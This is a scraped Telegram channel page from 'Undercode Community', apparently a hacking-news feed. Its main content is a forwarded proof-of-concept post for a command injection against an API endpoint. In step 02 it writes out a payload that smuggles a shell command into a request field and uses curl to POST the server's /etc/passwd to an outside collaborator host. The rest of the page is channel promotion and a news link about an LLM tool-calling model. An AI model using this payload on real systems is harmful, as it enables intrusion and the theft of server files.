UNDERCODE COMMUNITY
3.09K subscribers
1.25K photos
31 videos
2.65K files
116K links
🦑 Undercode World!
@UndercodeCommunity

1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

Youtube.com/Undercode
by Undercode.co.uk
Download Telegram
Forwarded from UNDERCODE TESTING
🦑POC steps:
01: I visit my target, I see my target, and I send a POST request to /v1/api HTTP/1.

02: I add this for getting the server location and other information. I replace with my Burp collaborator:

action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1&region=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+https://lnkd.in/dyhGdqi2)

04: After sending the request, I see the response: "return":false,"reason":"Syntax error!"

05: In Burp collaborator, I can see the server's /etc/passwd file.

@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🔧 #Python Is All You Need? Introducing Dria-Agent-α: Revolutionizing LLM Tool Interaction with Pythonic Function Calling

https://undercodenews.com/python-is-all-you-need-introducing-dria-agent-revolutionizing-llm-tool-interaction-with-pythonic-function-calling/

@Undercode_News